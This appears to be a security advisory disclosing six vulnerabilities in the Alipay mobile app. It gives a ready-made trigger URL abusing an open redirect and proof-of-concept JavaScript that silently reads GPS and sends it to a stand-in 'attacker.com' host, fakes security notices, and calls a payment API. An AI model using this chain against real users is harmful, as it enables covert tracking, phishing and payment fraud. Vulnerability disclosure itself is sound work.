# Alipay Mobile App - DeepLink+JSBridge Unauthorized API Access Chain
# CVE Pending (MITRE Ticket #2005801)
# 6 Vulnerabilities, CVSS 7.4–9.3

## Advisory Information

Title: Alipay DeepLink+JSBridge Attack Chain — Silent GPS Exfiltration & Unauthorized API Access
Researcher: Jiqiang Feng (Innora AI Security Research)
Vendor: Ant Group / Alibaba Group
Product: Alipay (支付宝) v10.8.30.x (Android & iOS)
Users Affected: 1 billion+
Risk: Critical (CVSS 9.3)
CVE: 6 IDs pending (MITRE Ticket #2005801)
Vendor Response: "Normal functionality" — refused to patch
Disclosure Timeline: Responsible disclosure Feb 25 → Public Mar 11, 2026

## Summary

A single crafted URL enables a complete attack chain against Alipay mobile app users:
crafted link → open redirect via trusted domain (ds.alipay.com) → Alipay deep link handler → attacker page loads in privileged WebView → JSBridge APIs silently exfiltrate GPS, device data, and can initiate payment flows — all without user consent or visible prompt.

## Vulnerability Details

### Vuln 1: Open Redirect Whitelist Bypass (CWE-601 + CWE-939, CVSS 9.3)
ds.alipay.com accepts a "scheme" parameter that redirects to arbitrary alipays:// URLs.
Since ds.alipay.com is whitelisted, this bypasses all URL validation in the Alipay client.

Attack URL:
https://ds.alipay.com/?scheme=alipays://platformapi/startapp?appId=20000067&url=[ATTACKER_URL]

### Vuln 2: Silent GPS Exfiltration (CWE-359, CVSS 7.4)
AlipayJSBridge.call('getLocation') returns GPS coordinates (8.8m accuracy) silently.
No user prompt, no consent dialog, completes in 7 seconds.

### Vuln 3: Unauthorized Payment Initiation (CWE-940, CVSS 8.6) [iOS only]
AlipayJSBridge.call('tradePay') can pre-fill and present payment screens.
Combined with "small amount password-free payment" feature, may enable zero-interaction payment.

### Vuln 4: UI Spoofing (CWE-451, CVSS 8.1)
AlipayJSBridge.call('showToast') and AlipayJSBridge.call('setTitle') allow attackers
to display fake system notifications and modify the WebView title bar.

### Vuln 5: Device Fingerprinting (CWE-200, CVSS 8.6)
AlipayJSBridge.call('getSystemInfo'), getNetworkType, getCameraPermission,
getMicrophonePermission expose device model, OS, carrier, sensor permissions.

### Vuln 6: DeepLink URL Scheme Handler Bypass (CWE-939, CVSS 9.1)
The alipays:// scheme handler loads external URLs in privileged WebView context
without proper origin validation, granting full JSBridge API access.

## Exploitable JSBridge APIs (Verified)

| API               | Data Extracted                    | Android | iOS |
|-------------------|-----------------------------------|---------|-----|
| getLocation       | GPS coords (8.8m accuracy)        | Yes     | Yes |
| getNetworkType    | WiFi/cellular, carrier info       | Yes     | Yes |
| getSystemInfo     | Device model, OS, screen          | Yes     | Yes |
| tradePay          | Pre-fill payment screen           | No      | Yes |
| share             | Trigger share dialog              | No      | Yes |
| scan              | Activate QR scanner               | No      | Yes |
| chooseImage       | Access photo picker               | No      | Yes |
| setTitle          | Modify WebView title (UI spoof)   | Yes     | Yes |
| showToast         | Fake system notifications         | Yes     | Yes |

## Proof of Concept

### Step 1: Trigger URL (distribute via SMS/email/QR)
https://ds.alipay.com/?scheme=alipays://platformapi/startapp?appId=20000067&url=https%3A%2F%2Finnora.ai%2Fzfb%2Fpoc%2Fverify.html

### Step 2: JSBridge exploitation code (runs inside Alipay WebView)
```javascript
// Wait for bridge
document.addEventListener('AlipayJSBridgeReady', function() {
  // Silent GPS exfiltration
  AlipayJSBridge.call('getLocation', {}, function(result) {
    // result.latitude, result.longitude — 8.8m accuracy
    // Exfiltrate to attacker server
    fetch('https://attacker.com/collect', {
      method: 'POST',
      body: JSON.stringify({
        lat: result.latitude,
        lng: result.longitude,
        city: result.city
      })
    });
  });

  // Device fingerprinting
  AlipayJSBridge.call('getSystemInfo', {}, function(info) {
    // info.brand, info.model, info.system, info.version
  });

  // UI spoofing
  AlipayJSBridge.call('setTitle', {title: 'Alipay Security Center'});
  AlipayJSBridge.call('showToast', {content: 'Verification successful'});

  // iOS only: payment initiation
  AlipayJSBridge.call('tradePay', {tradeNO: 'ATTACKER_ORDER'});
});
```

## Verification Evidence

- 3 test devices: Samsung S25 Ultra (NZ), Xiaomi Redmi 12 (MY), iPhone 16 Pro (CN)
- 308 server-side GPS exfiltration logs with real coordinates
- 42 verification screenshots
- Vendor's security lead tested on iPhone from Hangzhou (Alipay HQ) — GPS captured silently in 7s
- iOS exposes 5 additional critical APIs vs Android

## Disclosure Timeline

2026-02-25  Initial TLS/SSL report to vendor
2026-03-06  Vendor: "cannot be practically exploited"
2026-03-07  Expanded report: 17 vulns with full end-to-end proof
2026-03-07  Whitelist bypass achieved in 2 minutes during live call with vendor's security lead
2026-03-08  Vendor security lead's own iPhone tested — GPS captured
2026-03-10  Vendor final response: "normal functionality"
2026-03-11  Public disclosure
2026-03-11  Vendor's law firm files takedown complaint (4 hours after publication)
2026-03-12  6 CVEs submitted to MITRE CNA-LR (Ticket #2005801)

## References

Technical Report: https://innora.ai/zfb/
PoC Demo Page: https://innora.ai/zfb/poc/trigger.html
Rebuttal to Legal Complaint: https://innora.ai/zfb/rebuttal.html

## Credits

Jiqiang Feng — Innora AI Security Research
feng@innora.ai | https://innora.ai